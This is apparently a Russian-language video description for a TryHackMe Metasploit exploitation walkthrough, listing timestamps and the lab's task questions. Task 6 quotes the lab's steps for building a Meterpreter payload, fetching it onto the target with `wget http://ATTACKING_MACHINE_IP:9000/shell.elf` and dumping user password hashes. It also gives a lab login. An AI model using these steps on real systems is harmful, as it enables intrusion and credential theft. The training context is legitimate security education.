TryHackMe Metasploit: Эксплуатация | Полное руководство 2026
Автор: Djalil Ayed
Загружено: 2026-02-22
Просмотров: 509
Описание:
Использование Metasploit для сканирования, оценки уязвимостей и их эксплуатации.
🔗🔗🔗 Ссылка на комнату: https://tryhackme.com/room/metasploit...
🐍🐍 Темы, которые мы рассмотрим: 🐍🐍
🐱 Как сканировать целевые системы с помощью Metasploit.
🐱 Как использовать функцию базы данных Metasploit.
🐱 Как использовать Metasploit для проведения сканирования уязвимостей.
🐱 Как использовать Metasploit для эксплуатации уязвимых сервисов в целевых системах.
🐱 Как использовать msfvenom для создания полезных нагрузок и получения сессии Meterpreter в целевой системе.
[Временные метки]
[00:00:00] Задание 1: Введение
[00:01:12] Задание 2: Сканирование
[00:11:38] Задание 3: База данных Metasploit
[00:19:46] Задание 4: Сканирование уязвимостей
[00:22:15] Задание 5: Эксплуатация
[00:35:27] Задание 6: Msfvenom
[00:53:53] Задание 7: Резюме
🐍🐍 Задания комнаты: 🐍🐍
🧀 Задание 1: Введение
🧀 Задание 2: Сканирование
Сколько портов открыто в целевой системе?
Используя соответствующий сканер, какое имя NetBIOS вы видите?
Что работает на порту 8000?
Какой пароль SMB у пользователя "penny"? Используйте список слов, упомянутый в предыдущем задании.
🧀 Задание 3: База данных Metasploit
🧀 Задание 4: Сканирование уязвимостей
🧀 Задание 5: Эксплуатация
Эксплуатируйте одну из критических уязвимостей на целевой виртуальной машине.
Каково содержимое файла flag.txt?
Каков NTLM-хеш пароля пользователя "pirate"?
🧀 Задание 6: Msfvenom
Запустите виртуальную машину, указанную в этом задании. Имя пользователя - murphy, пароль - 1q2w3e4r. Вы можете подключиться через SSH или запустить эту машину в браузере. В терминале введите "sudo su", чтобы получить root-оболочку, это упростит задачу.
Создайте полезную нагрузку Meterpreter в формате .elf (на AttackBox или на выбранной вами атакующей машине).
Перенесите его на целевую машину (вы можете запустить веб-сервер Python на атакующей машине с помощью команды `python3 -m http.server 9000` и использовать `wget http://ATTACKING_MACHINE_IP:9000/shell.elf` для загрузки на целевую машину).
Получите сессию Meterpreter на целевой машине.
Используйте модуль постэксплуатации для получения хешей паролей других пользователей в системе.
Какой хеш пароля у другого пользователя?
🧀 Задание 7: Резюме
⚠️ Только для образовательных целей
Этот контент предназначен только для образовательных целей и авторизованного тестирования на проникновение. Всегда убедитесь, что у вас есть разрешение, прежде чем тестировать на каких-либо системах.
Не забудьте поставить 👍 ЛАЙК и 🔔 ПОДПИСАТЬСЯ, чтобы получать больше уроков по кибербезопасности!
#tryhackme
Повторяем попытку...
Доступные форматы для скачивания:
Скачать видео
-
Информация по загрузке: